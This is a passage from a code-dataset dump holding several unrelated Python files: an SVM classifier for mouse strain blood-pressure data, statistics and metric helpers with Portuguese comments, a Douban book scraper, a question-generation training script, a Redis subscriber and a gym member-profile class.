names)\r\n x = calc_avg_one_column(next(iterargs), kresli) # Calls the function to calculate the averages.\r\n for column_name in iterargs:\r\n x = x.join(calc_avg_one_column(column_name, kresli))\r\n\r\n x = x.join(strain_map.set_index('id'))\r\n\r\n return x\r\n\r\n table_avg = calc_avg_one_column_multiple(False, # We don't want to plot the scatterplots now\r\n 'pulsePressure',\r\n 'diastolicBP',\r\n 'meanBP',\r\n 'systolicBP',\r\n 'heartRate',\r\n 'activity')\r\n\r\n # Transform the features from pandas.df into numpy.array\r\n X = np.array(table_avg[['pulsePressuredark', 'pulsePressurelight',\r\n 'diastolicBPdark', 'diastolicBPlight',\r\n 'meanBPdark', 'meanBPlight',\r\n 'systolicBPdark', 'systolicBPlight',\r\n 'heartRatedark', 'heartRatelight',\r\n 'activitydark', 'activitylight']])\r\n\r\n # Prepare the labels, transform into numpy.array\r\n y = np.ravel(np.array(table_avg[['strain']]))\r\n\r\n # Split the dataset into the training and test\r\n X_train, X_test, y_train, y_test = train_test_split(X, y,\r\n test_size=0.3,\r\n random_state=42)\r\n # Scale(standardize) the features. Transform both of the sets, but train only on training set.\r\n # We treat the test set as not seen before the training.\r\n scaler = StandardScaler()\r\n scaler.fit(X_train)\r\n X_train = scaler.transform(X_train)\r\n X_test = scaler.transform(X_test)\r\n\r\n # Prepare the grid of parameters for grid-search. We want to find the best C parameter.\r\n # Kernel is left from when we tried other kernels, before deciding to keep it simple.\r\n param_grid = {\r\n 'C': [2**(2*i-1) for i in range(-2,9)],\r\n 'kernel': ['linear']\r\n }\r\n\r\n # Perform the grid search.\r\n clf = GridSearchCV(SVC(),\r\n param_grid,\r\n scoring='f1_micro',\r\n n_jobs = -1)\r\n clf.fit(X_train, y_train)\r\n print(\"Best parameter (CV score=%0.3f):\" % clf.best_score_)\r\n print(clf.best_params_)\r\n\r\n # Use the model trained with the best value of hyperparameter C, to validate on test set.\r\n pred = clf.best_estimator_.predict(X_test)\r\n print(confusion_matrix(y_test, pred))\r\n print(classification_report(y_test, pred))\r\n\r\n\r\n\r\n\r\n# =============================================================================\r\n# # Plot exemplary SVM\r\n# # Exemplary figure to show SVM in 2D\r\n#\r\n# y = np.ravel(np.array(table_avg[['strain']]))\r\n# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=42)\r\n#\r\n# clf = svm.SVC(kernel='linear')\r\n# clf.fit(X_train[:, [5,9]], y_train)\r\n# y_pred = clf.predict(X_test[:,[5,9]])\r\n# print(confusion_matrix(y_test,y_pred))\r\n# print(classification_report(y_test,y_pred))\r\n#\r\n# fig = plt.figure()\r\n# ax = plt.gca()\r\n# x_min, x_max = X_test[:,5].min() - 1, X_test[:,5].max() + 1\r\n# y_min, y_max = X_test[:,9].min() - 1, X_test[:,9].max() + 1\r\n# xx, yy = np.meshgrid(np.arange(x_min, x_max, (x_max-x_min)/1000), np.arange(y_min, y_max, (y_max-y_min)/1000))\r\n# Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\r\n# #Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])\r\n# Z = Z.reshape(xx.shape)\r\n# cmap = colors.ListedColormap(['#F5793A','#A95AA1','#0F2080','#85C0F9'])\r\n# bounds = [0, 0.9, 1.9, 2.9, 3.9]\r\n# norm = colors.BoundaryNorm(bounds, cmap.N)\r\n# ax.pcolor(xx, yy, (np.vectorize(encoder.get)(Z)).astype(int), cmap=cmap, norm=norm)\r\n# ax.scatter(X_test[:,5], X_test[:,9], c=(np.vectorize(encoder.get)(y_test)).astype(int), cmap=cmap, norm=norm, s=40, edgecolors='k')\r\n# ax.xaxis.label.set_fontsize(10)\r\n# ax.yaxis.label.set_fontsize(10)\r\n# ax.set_xlabel('Blood Pressure (mmHg)')\r\n# ax.set_ylabel('Heart Rate (BPM)')\r\n# #plt.savefig('svm_heartRate.png', dpi=300, transparent=True)\r\n# =============================================================================\r\n\r\n\r\n# Wrapper for executing the main script.\r\n# We do this to ensure that the long process of training the ML model is not executed when importing the strain map.\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"method1_complete.py","file_name":"method1_complete.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"222668836","text":"## Medidas de Dispersão e Tendências\r\n## 1º) Este programa em python recebe um variável do tipo \"numpy\" e realiza a conversão da mesma para o tipo \"array\".\r\n## 2º) Importa a biblioteca \"Pandas\" e realiza os seguintes cálculos:\r\n## media, desvioPadrao, desvioAbsoluto, mediana, quantil, moda, minimo, maximo, amplitude, variancia, tabAux , dadosNump\r\n##\r\ndef medidasDispersaotendencia (serieOriginal):\r\n #print (\"tam serie=\", len(serieOriginal))\r\n import pandas as pd\r\n serieConvertArray = []\r\n #print(\"serieOriginal=\", serieOriginal)\r\n for item in serieOriginal:\r\n serieConvertArray.append(float(item))\r\n\r\n serie = pd.Series(serieConvertArray)\r\n media = serie.mean()\r\n mediana = serie.median()\r\n quantil = serie.quantile()\r\n moda = serie.mode()\r\n minimo = serie.min()\r\n maximo = serie.max()\r\n amplitude = maximo - minimo\r\n variancia = serie.var()\r\n desvioPadrao = serie.std()\r\n desvioAbsoluto = serie.mad()\r\n\r\n\r\n\r\n from numpy import array\r\n serieNump = array(serieConvertArray)\r\n\r\n # print(\"metricas\", media, desvioPadrao, desvioAbsoluto, mediana, quantil) #, moda, minimo, maximo, amplitude, variancia)\r\n # print(\"min\", minimo, \"max\", maximo, \"ampli\", amplitude, \"var\",variancia)\r\n #exit()\r\n return media, desvioPadrao, desvioAbsoluto, mediana, quantil, minimo, maximo, amplitude, variancia, serieConvertArray , serieNump , moda\r\n\r\n\r\n# Medias de Tendência\r\n# ===================\r\n# Média : medida de tendência central que indica o valor onde estão concentrados os dados de um conjunto de valores;\r\n# Mediana : valor que separa a metade superior da metade inferior de uma distribuição de dados, ou o valor no centro da distribuição. Caso o número de observações na distribuição é ímpar, ele é o valor central, e se o número de observações é par, ele será a média das duas observações mais centrais.\r\n# Quantil : é uma generalização da mediana, valor abaixo do qual está um certo percentual dos dados. No caso da mediana, esse percentual é de 50%\r\n# Moda : é que o valor que mais se repete dentro de um conjunto.\r\n\r\n# Medidas de Dispersão\r\n# ====================\r\n# Amplitude : é a diferença entre o maior e o menor valor de um conjunto de dados.\r\n# Variância : é uma medida que expressa quanto os dados de um conjunto estão afastados de seu valor esperado.\r\n# Desvio Padrão : é uma medida de dispersão, que indica quanto os dados estão afastados da média. Um valor de desvio padrão alto indica que os valores estão mais espalhados, mais longe da média, e um desvio padrão baixo indica que os valores estão mais próximos da média.\r\n# Desvio Absoluto : primeiro, encontramos a média dos valores; depois, calculamos a distância de cada ponto desta média; somamos as distâncias e dividimos o resultado pela média destas distâncias.\r\n\r\n # Fonte: http://felipegalvao.com.br/blog/2016/03/31/estatistica-descritiva-com-python/\r\n\r\n\r\ndef MD(serieReal, seriePrevista):\r\n from sklearn import metrics\r\n import numpy as np\r\n acuracia = metrics.accuracy_score (serieReal,seriePrevista) * 100\r\n f1scores = metrics.f1_score (serieReal,seriePrevista,labels=np.unique(seriePrevista)) * 100\r\n recalls = metrics.recall_score (serieReal,seriePrevista) * 100\r\n precision= metrics.precision_score(serieReal,seriePrevista) * 100\r\n\r\n return precision, acuracia, f1scores, recalls\r\n\r\n# Medidas de Desempenho (Gravando)\r\ndef MDgravar(TesteY, predicao , algoritmo , saida2):\r\n from sklearn import metrics\r\n import numpy as np\r\n acuracia = metrics.accuracy_score(TesteY,predicao)\r\n f1scores = metrics.f1_score(TesteY,predicao,labels=np.unique(predicao))\r\n recalls = metrics.recall_score(TesteY,predicao)\r\n precision= metrics.precision_score(TesteY,predicao)\r\n\r\n acuracia = round(float(acuracia),2)\r\n f1scores = round(float(f1scores),2)\r\n recalls = round(float(recalls),2)\r\n\r\n saida2.write(str(algoritmo) + \";\" + \r\n str(acuracia) + \";\" + \r\n str(f1scores) + \";\" + \r\n str(recalls) + \";\" + \r\n str(precision) + \"\\n\"\r\n )\r\n return\r\n\r\n\r\ndef calculado(serieRealA, seriePrevistaA):\r\n qtdePositivo=0\r\n qtdeNegativo=0\r\n truePositivo=0\r\n falsePositivo=0\r\n trueNegativo=0\r\n falseNegativo=0\r\n\r\n precisao=0\r\n acuracia=0\r\n f1score =0\r\n recall =0\r\n specificity =0\r\n\r\n serieReal = []\r\n seriePrevista = []\r\n\r\n for item in serieRealA: #==>> Convertendo numpy array to List\r\n serieReal.append(int(item))\r\n\r\n for item in seriePrevistaA:\r\n seriePrevista.append(int(item))\r\n\r\n i=0\r\n while i< len(serieReal):\r\n if seriePrevista[i]==0:\r\n qtdeNegativo+=1\r\n if seriePrevista[i]==serieReal[i]:\r\n trueNegativo+=1\r\n else:\r\n falseNegativo+=1\r\n\r\n if seriePrevista[i]==1:\r\n qtdePositivo+=1\r\n if seriePrevista[i]==serieReal[i]:\r\n truePositivo+=1\r\n else:\r\n falsePositivo+=1\r\n\r\n i+=1\r\n\r\n\r\n if (truePositivo + trueNegativo) !=0:\r\n acuracia = (truePositivo + trueNegativo) / ( truePositivo + trueNegativo + falsePositivo + falseNegativo)\r\n\r\n if truePositivo !=0:\r\n precisao = truePositivo / (truePositivo + falsePositivo)\r\n\r\n if truePositivo !=0:\r\n recall = truePositivo / (truePositivo + falseNegativo)\r\n\r\n\r\n if precisao !=0:\r\n f1score = 2*precisao*recall / (precisao+recall)\r\n\r\n if trueNegativo !=0:\r\n specificity = trueNegativo / (trueNegativo + falsePositivo)\r\n\r\n return precisao*100, acuracia*100, f1score*100, recall*100, specificity*100\r\n\r\n\r\n# Fonte: http://felipegalvao.com.br/blog/2016/03/31/estatistica-descritiva-com-python/\r\n#\r\n# Medidas de Tendência Central\r\n#\r\n# As medidas de tendência central definem valores significativos, representativos e adequados para um conjunto de dados,\r\n# dependendo do que se deseja analisar. São elas a média, mediana, quantis e a moda.\r\n#\r\n#\r\ndef medidastendencia(tab):\r\n import pandas as pd\r\n #tab =[22,23,21,28,10,30,38,16, 38]\r\n serie = pd.Series(tab)\r\n\r\n# Média\r\n# A média é uma medida de tendência central que indica o valor onde estão concentrados os dados de um conjunto de valores,\r\n# representando um valor significativo para o mesmo.\r\n media = serie.mean()\r\n\r\n# Mediana e Quantil\r\n# A mediana é o valor que separa a metade superior da metade inferior de uma distribuição de dados, ou o valor no centro da distribuição.\r\n# Na prática, se o número de observações na distribuição é ímpar, ele é o valor central, e se o número de observações é par, ele será a\r\n# média das duas observações mais centrais.\r\n mediana = serie.median()\r\n\r\n# Já o quantil pode ser entendido como uma generalização da mediana. O quantil é o valor abaixo do qual está um certo percentual dos dados.\r\n# No caso da mediana, esse percentual é de 50%\r\n quantil = serie.quantile()\r\n\r\n# Moda\r\n# A moda é simples. Nada mais é que o valor que mais se repete dentro de um conjunto.\r\n moda = serie.mode()\r\n\r\n\r\n print(\"media=\", media)\r\n print(\"mediana=\", mediana)\r\n print(\"quantil=\", quantil)\r\n print(\"moda=\", moda)\r\n return media, mediana, quantil, moda","sub_path":"20190826 - simulacao RBM + KNN V64/f_metricas.py","file_name":"f_metricas.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"585727381","text":"import requests\r\nimport re\r\nimport pandas as pd\r\n\r\ndef getHTMLText(url,List):\r\n try:\r\n for i in range(50):\r\n r = requests.get(url+str(i*20))\r\n print (r.url)\r\n r.raise_for_status\r\n r.encoding = r.apparent_encoding\r\n\r\n fillList(r.text,List)\r\n except:\r\n return \"\"\r\n\r\ndef fillList(html,List):\r\n print('-'*10)\r\n for each in re.findall(r'
  • .*?
  • ',html,re.S):\r\n title = re.findall(r'title=\"(.*?)\"',each)[0]\r\n text = re.findall(r'
    (.*?)
    ',each,re.S)[0].strip()\r\n author = text.split('/')[0].strip()\r\n translator = text.split('/',2)[1].strip()\r\n publish = text.split('/',3)[2].strip()\r\n time = text.split('/',4)[-2].strip()\r\n price = text.split('/',4)[-1].strip()\r\n List.append([title,author,translator,publish,time,price])\r\n return List\r\n\r\n\r\ndef printList(List):\r\n #tplt = '{0:^10}\\t{1:{7}^15}\\t{2:{7}^15}\\t{3:{7}^15}\\t{4:{7}^12}\\t{5:{7}^8}\\t{6:{7}^10}'\r\n #print (tplt.format('num','名称','作者','翻译','出版社','出版时间','价格',chr(12288)))\r\n #for i in range(len(List)):\r\n # u = List[i]\r\n # print(tplt.format(str(i+1),u[0],u[1],u[2],u[3],u[4],u[5],chr(12288)))\r\n name = ['序号','名称','作者','翻译','出版社','价格']\r\n test = pd.DataFrame(columns = name,data = List)\r\n test.to_csv('C:\\\\Users\\\\Administrator\\\\Desktop\\\\爬虫进阶\\\\豆瓣推理小说.csv')\r\n \r\n\r\n\r\ndef main():\r\n url = 'https://book.douban.com/tag/推理?start='\r\n List = []\r\n html = getHTMLText(url,List)\r\n printList(List)\r\n\r\nmain()\r\n \r\n","sub_path":"豆瓣.py","file_name":"豆瓣.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"27683540","text":"def accuracy(output, target, ks=(1,5), ):\n maxk = max(ks) \n batch_size = target.size(0)\n # output is a batch_size x num_categories tensor (row vecs)\n # returns the indices (aka cat ids)\n _, prediction = output.topk(maxk, dim=1, largest=True, sorted=True)\n # prediction is a batch_size x k array where each row is the top k index predictions for that batch item.\n prediction = prediction.t() # transpose to a matrix of dim k x batch_size\n # the view call reshapes the tensor w/ one row and arbitrary cols \n # expand_as just drags out the end of the tensor out....\n #this line flattens the target into a row vector with len bach_size and repeats it k times to get something the same shape as prediction, then equates\n correct = prediction.eq(target.view(1, -1).expand_as(prediction))\n\n ret = []\n for k in ks: \n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n ret.append(correct_k.mul(100.0 / batch_size))\n return ret\n\n\n","sub_path":"Resnet Code/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"56892663","text":"# -*- coding: utf-8 -*-\n#used for training Question Generation Model\nfrom __future__ import print_function\nimport argparse\nimport os\nimport sys\nimport time\nimport numpy as np\nimport codecs\n\nfrom vocab_utils import Vocab\nimport namespace_utils\nimport NP2P_data_stream\nfrom NP2P_model_graph import ModelGraph\n\nFLAGS = None\nimport tensorflow as tf\ntf.logging.set_verbosity(tf.logging.ERROR) # DEBUG, INFO, WARN, ERROR, and FATAL\n\nfrom nltk.translate.bleu_score import SmoothingFunction, corpus_bleu, sentence_bleu\ncc = SmoothingFunction()\n\nimport metric_utils\n\nimport platform\ndef get_machine_name():\n return platform.node()\n\ndef vec2string(val):\n result = \"\"\n for v in val:\n result += \" {}\".format(v)\n return result.strip()\n\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum()\n\n\ndef document_bleu(vocab, gen, ref, suffix=''):\n genlex = [vocab.getLexical(x)[1] for x in gen]\n reflex = [[vocab.getLexical(x)[1],] for x in ref]\n #return metric_utils.evaluate_captions(genlex,reflex)\n genlst = [x.split() for x in genlex]\n reflst = [[x[0].split()] for x in reflex]\n f = codecs.open('gen.txt'+suffix,'w','utf-8')\n for line in genlex:\n print(line, end='\\n', file=f)\n f.close()\n f = codecs.open('ref.txt'+suffix,'w','utf-8')\n for line in reflex:\n print(line[0], end='\\n', file=f)\n f.close()\n return corpus_bleu(reflst, genlst, smoothing_function=cc.method3)\n\n\ndef evaluate(sess, valid_graph, devDataStream, options=None, suffix=''):\n devDataStream.reset()\n gen = []\n ref = []\n dev_loss = 0.0\n dev_right = 0.0\n dev_total = 0.0\n for batch_index in xrange(devDataStream.get_num_batch()): # for each batch\n cur_batch = devDataStream.get_batch(batch_index)\n if valid_graph.mode == 'evaluate':\n accu_value, loss_value = valid_graph.run_ce_training(sess, cur_batch, options, only_eval=True)\n dev_loss += loss_value\n dev_right += accu_value\n dev_total += np.sum(cur_batch.answer_lengths)\n elif valid_graph.mode == 'evaluate_bleu':\n gen.extend(valid_graph.run_greedy(sess, cur_batch, options).tolist())\n ref.extend(cur_batch.in_answer_words.tolist())\n else:\n assert False\n\n if valid_graph.mode == 'evaluate':\n return {'dev_loss':dev_loss, 'dev_accu':1.0*dev_right/dev_total, 'dev_right':dev_right, 'dev_total':dev_total, }\n else:\n return {'dev_bleu':document_bleu(valid_graph.word_vocab,gen,ref,suffix), }\n\n\n\ndef main(_):\n print('Configurations:')\n print(FLAGS)\n\n log_dir = FLAGS.model_dir\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n path_prefix = log_dir + \"/NP2P.{}\".format(FLAGS.suffix)\n log_file_path = path_prefix + \".log\"\n print('Log file path: {}'.format(log_file_path))\n log_file = open(log_file_path, 'wt')\n log_file.write(\"{}\\n\".format(FLAGS))\n log_file.flush()\n\n # save configuration\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n\n print('Loading train set.')\n if FLAGS.infile_format == 'fof':\n trainset, train_ans_len = NP2P_data_stream.read_generation_datasets_from_fof(FLAGS.train_path, isLower=FLAGS.isLower)\n elif FLAGS.infile_format == 'plain':\n trainset, train_ans_len = NP2P_data_stream.read_all_GenerationDatasets(FLAGS.train_path, isLower=FLAGS.isLower)\n else:\n trainset, train_ans_len = NP2P_data_stream.read_all_GQA_questions(FLAGS.train_path, isLower=FLAGS.isLower, switch=FLAGS.switch_qa)\n print('Number of training samples: {}'.format(len(trainset)))\n\n print('Loading test set.')\n if FLAGS.infile_format == 'fof':\n testset, test_ans_len = NP2P_data_stream.read_generation_datasets_from_fof(FLAGS.test_path, isLower=FLAGS.isLower)\n elif FLAGS.infile_format == 'plain':\n testset, test_ans_len = NP2P_data_stream.read_all_GenerationDatasets(FLAGS.test_path, isLower=FLAGS.isLower)\n else:\n testset, test_ans_len = NP2P_data_stream.read_all_GQA_questions(FLAGS.test_path, isLower=FLAGS.isLower, switch=FLAGS.switch_qa)\n print('Number of test samples: {}'.format(len(testset)))\n\n max_actual_len = max(train_ans_len, test_ans_len)\n print('Max answer length: {}, truncated to {}'.format(max_actual_len, FLAGS.max_answer_len))\n\n word_vocab = None\n POS_vocab = None\n NER_vocab = None\n char_vocab = None\n has_pretrained_model = False\n best_path = path_prefix + \".best.model\"\n if os.path.exists(best_path + \".index\"):\n has_pretrained_model = True\n print('!!Existing pretrained model. Loading vocabs.')\n if FLAGS.with_word:\n word_vocab = Vocab(FLAGS.word_vec_path, fileformat='txt2')\n print('word_vocab: {}'.format(word_vocab.word_vecs.shape))\n if FLAGS.with_char:\n char_vocab = Vocab(path_prefix + \".char_vocab\", fileformat='txt2')\n print('char_vocab: {}'.format(char_vocab.word_vecs.shape))\n if FLAGS.with_POS:\n POS_vocab = Vocab(path_prefix + \".POS_vocab\", fileformat='txt2')\n print('POS_vocab: {}'.format(POS_vocab.word_vecs.shape))\n if FLAGS.with_NER:\n NER_vocab = Vocab(path_prefix + \".NER_vocab\", fileformat='txt2')\n print('NER_vocab: {}'.format(NER_vocab.word_vecs.shape))\n else:\n print('Collecting vocabs.')\n (allWords, allChars, allPOSs, allNERs) = NP2P_data_stream.collect_vocabs(trainset)\n print('Number of words: {}'.format(len(allWords)))\n print('Number of allChars: {}'.format(len(allChars)))\n print('Number of allPOSs: {}'.format(len(allPOSs)))\n print('Number of allNERs: {}'.format(len(allNERs)))\n\n if FLAGS.with_word:\n word_vocab = Vocab(FLAGS.word_vec_path, fileformat='txt2')\n if FLAGS.with_char:\n char_vocab = Vocab(voc=allChars, dim=FLAGS.char_dim, fileformat='build')\n char_vocab.dump_to_txt2(path_prefix + \".char_vocab\")\n if FLAGS.with_POS:\n POS_vocab = Vocab(voc=allPOSs, dim=FLAGS.POS_dim, fileformat='build')\n POS_vocab.dump_to_txt2(path_prefix + \".POS_vocab\")\n if FLAGS.with_NER:\n NER_vocab = Vocab(voc=allNERs, dim=FLAGS.NER_dim, fileformat='build')\n NER_vocab.dump_to_txt2(path_prefix + \".NER_vocab\")\n\n print('word vocab size {}'.format(word_vocab.vocab_size))\n sys.stdout.flush()\n\n print('Build DataStream ... ')\n trainDataStream = NP2P_data_stream.QADataStream(trainset, word_vocab, char_vocab, POS_vocab, NER_vocab, options=FLAGS,\n isShuffle=True, isLoop=True, isSort=True)\n\n devDataStream = NP2P_data_stream.QADataStream(testset, word_vocab, char_vocab, POS_vocab, NER_vocab, options=FLAGS,\n isShuffle=False, isLoop=False, isSort=True)\n print('Number of instances in trainDataStream: {}'.format(trainDataStream.get_num_instance()))\n print('Number of instances in devDataStream: {}'.format(devDataStream.get_num_instance()))\n print('Number of batches in trainDataStream: {}'.format(trainDataStream.get_num_batch()))\n print('Number of batches in devDataStream: {}'.format(devDataStream.get_num_batch()))\n sys.stdout.flush()\n\n init_scale = 0.01\n # initialize the best bleu and accu scores for current training session\n best_accu = FLAGS.best_accu if FLAGS.__dict__.has_key('best_accu') else 0.0\n best_bleu = FLAGS.best_bleu if FLAGS.__dict__.has_key('best_bleu') else 0.0\n if best_accu > 0.0:\n print('With initial dev accuracy {}'.format(best_accu))\n if best_bleu > 0.0:\n print('With initial dev BLEU score {}'.format(best_bleu))\n\n with tf.Graph().as_default():\n initializer = tf.random_uniform_initializer(-init_scale, init_scale)\n with tf.name_scope(\"Train\"):\n with tf.variable_scope(\"Model\", reuse=None, initializer=initializer):\n train_graph = ModelGraph(word_vocab=word_vocab, char_vocab=char_vocab, POS_vocab=POS_vocab,\n NER_vocab=NER_vocab, options=FLAGS, mode=FLAGS.mode)\n\n assert FLAGS.mode in ('ce_train', 'rl_train', )\n valid_mode = 'evaluate' if FLAGS.mode == 'ce_train' else 'evaluate_bleu'\n\n with tf.name_scope(\"Valid\"):\n with tf.variable_scope(\"Model\", reuse=True, initializer=initializer):\n valid_graph = ModelGraph(word_vocab=word_vocab, char_vocab=char_vocab, POS_vocab=POS_vocab,\n NER_vocab=NER_vocab, options=FLAGS, mode=valid_mode)\n\n initializer = tf.global_variables_initializer()\n\n vars_ = {}\n for var in tf.all_variables():\n if \"word_embedding\" in var.name: continue\n if not var.name.startswith(\"Model\"): continue\n vars_[var.name.split(\":\")[0]] = var\n saver = tf.train.Saver(vars_)\n\n sess = tf.Session()\n sess.run(initializer)\n if has_pretrained_model:\n print(\"Restoring model from \" + best_path)\n saver.restore(sess, best_path)\n print(\"DONE!\")\n\n if FLAGS.mode == 'rl_train' and abs(best_bleu) < 0.00001:\n print(\"Getting BLEU score for the model\")\n best_bleu = evaluate(sess, valid_graph, devDataStream, options=FLAGS)['dev_bleu']\n FLAGS.best_bleu = best_bleu\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n print('BLEU = %.4f' % best_bleu)\n log_file.write('BLEU = %.4f\\n' % best_bleu)\n if FLAGS.mode == 'ce_train' and abs(best_accu) < 0.00001:\n print(\"Getting ACCU score for the model\")\n best_accu = evaluate(sess, valid_graph, devDataStream, options=FLAGS)['dev_accu']\n FLAGS.best_accu = best_accu\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n print('ACCU = %.4f' % best_accu)\n log_file.write('ACCU = %.4f\\n' % best_accu)\n\n print('Start the training loop.')\n train_size = trainDataStream.get_num_batch()\n max_steps = train_size * FLAGS.max_epochs\n total_loss = 0.0\n start_time = time.time()\n for step in xrange(max_steps):\n cur_batch = trainDataStream.nextBatch()\n if FLAGS.mode == 'rl_train':\n loss_value = train_graph.run_rl_training_2(sess, cur_batch, FLAGS)\n elif FLAGS.mode == 'ce_train':\n loss_value = train_graph.run_ce_training(sess, cur_batch, FLAGS)\n total_loss += loss_value\n\n if step % 100==0:\n print('{} '.format(step), end=\"\")\n sys.stdout.flush()\n\n\n # Save a checkpoint and evaluate the model periodically.\n if (step + 1) % trainDataStream.get_num_batch() == 0 or (step + 1) == max_steps:\n print()\n duration = time.time() - start_time\n print('Step %d: loss = %.2f (%.3f sec)' % (step, total_loss, duration))\n log_file.write('Step %d: loss = %.2f (%.3f sec)\\n' % (step, total_loss, duration))\n log_file.flush()\n sys.stdout.flush()\n total_loss = 0.0\n\n # Evaluate against the validation set.\n start_time = time.time()\n print('Validation Data Eval:')\n res_dict = evaluate(sess, valid_graph, devDataStream, options=FLAGS, suffix=str(step))\n if valid_graph.mode == 'evaluate':\n dev_loss = res_dict['dev_loss']\n dev_accu = res_dict['dev_accu']\n dev_right = int(res_dict['dev_right'])\n dev_total = int(res_dict['dev_total'])\n print('Dev loss = %.4f' % dev_loss)\n log_file.write('Dev loss = %.4f\\n' % dev_loss)\n print('Dev accu = %.4f %d/%d' % (dev_accu, dev_right, dev_total))\n log_file.write('Dev accu = %.4f %d/%d\\n' % (dev_accu, dev_right, dev_total))\n log_file.flush()\n if best_accu < dev_accu:\n print('Saving weights, ACCU {} (prev_best) < {} (cur)'.format(best_accu, dev_accu))\n saver.save(sess, best_path)\n best_accu = dev_accu\n FLAGS.best_accu = dev_accu\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n else:\n dev_bleu = res_dict['dev_bleu']\n print('Dev bleu = %.4f' % dev_bleu)\n log_file.write('Dev bleu = %.4f\\n' % dev_bleu)\n log_file.flush()\n if best_bleu < dev_bleu:\n print('Saving weights, BLEU {} (prev_best) < {} (cur)'.format(best_bleu, dev_bleu))\n saver.save(sess, best_path)\n best_bleu = dev_bleu\n FLAGS.best_bleu = dev_bleu\n namespace_utils.save_namespace(FLAGS, path_prefix + \".config.json\")\n duration = time.time() - start_time\n print('Duration %.3f sec' % (duration))\n sys.stdout.flush()\n\n log_file.write('Duration %.3f sec\\n' % (duration))\n log_file.flush()\n\n log_file.close()\n\ndef enrich_options(options):\n if not options.__dict__.has_key(\"CE_loss\"):\n options.__dict__[\"CE_loss\"] = False\n\n if not options.__dict__.has_key(\"infile_format\"):\n options.__dict__[\"infile_format\"] = \"plain\"\n\n if not options.__dict__.has_key(\"with_target_lattice\"):\n options.__dict__[\"with_target_lattice\"] = False\n\n if not options.__dict__.has_key(\"add_first_word_prob_for_phrase\"):\n options.__dict__[\"add_first_word_prob_for_phrase\"] = False\n\n if not options.__dict__.has_key(\"pretrain_with_max_matching\"):\n options.__dict__[\"pretrain_with_max_matching\"] = False\n\n if not options.__dict__.has_key(\"reward_type\"):\n options.__dict__[\"reward_type\"] = \"bleu\"\n\n return options\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--config_path', type=str, help='Configuration file.')\n\n print(\"CUDA_VISIBLE_DEVICES \" + os.environ['CUDA_VISIBLE_DEVICES'])\n FLAGS, unparsed = parser.parse_known_args()\n\n\n if FLAGS.config_path is not None:\n print('Loading the configuration from ' + FLAGS.config_path)\n FLAGS = namespace_utils.load_namespace(FLAGS.config_path)\n\n FLAGS = enrich_options(FLAGS)\n\n sys.stdout.flush()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","sub_path":"src/NP2P_trainer.py","file_name":"NP2P_trainer.py","file_ext":"py","file_size_in_byte":14731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"227268439","text":"\nimport threading\n\nimport settings\n\nclass Subscriber(threading.Thread):\n def __init__(self, redis):\n self.pubsub = redis.pubsub()\n self.pubsub.subscribe(settings.CHANNEL + 'out')\n self.result = None\n\n threading.Thread.__init__(self)\n \n def run(self):\n self.listener = self.pubsub.listen()\n while True:\n message = self.listener.next()\n if message['type'] == 'subscribe':\n continue\n self.result = message['data']\n break\n","sub_path":"rustkr/models/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"588716389","text":"import csv\r\nclass memberprofile:\r\n\r\n def __init__(self, ph_no, bmi, name):\r\n self.mobile_no = ph_no\r\n self.name = name\r\n self.a_bmi = bmi\r\n self.user_member = []\r\n self.regimen = []\r\n cv = csv.reader(open(\"regimen_list.csv\", \"r\", newline=\"\"))\r\n for row in cv:\r\n self.regimen.append(row)\r\n dv = csv.reader(open(\"user_member_list.csv\", \"r\", newline=\"\"))\r\n for row in dv:\r\n self.user_member.append(row)\r\n\r\n def my_profile(self):\r\n n = self.mobile_no\r\n for i in self.user_member:\r\n if int(i[3]) == n:\r\n print(\"Full Name:{0} \\nAge:{1} \\nGender:{2} \\nMobile Number:{3} \\nEmail:{4} \\nBMI:{5} \\nMembership Duration:{6}\".format(i[0], i[1], i[2], i[3], i[4], i[5], i[6]))\r\n break\r\n\r\n def my_regimen(self):\r\n for i in self.regimen:\r\n if self.a_bmi == float(i[0]):\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n \"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7]))\r\n break\r\n elif self.a_bmi < 18.5 and float(i[0]) == 18.5:\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n \"\\nFriday:{} \\nSaturday:{} \\nSunday:{}\".format(i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7]))\r\n break\r\n elif self.a_bmi < 25 and float(i[0]) == 25:\r\n print(\"{} Your Workout Regimen\".format(self.name))\r\n print(\"BMI:{} \\nMonday:{} \\nTuesday:{} \\nWednesday:{} \\nThursday:{} \"\r\n 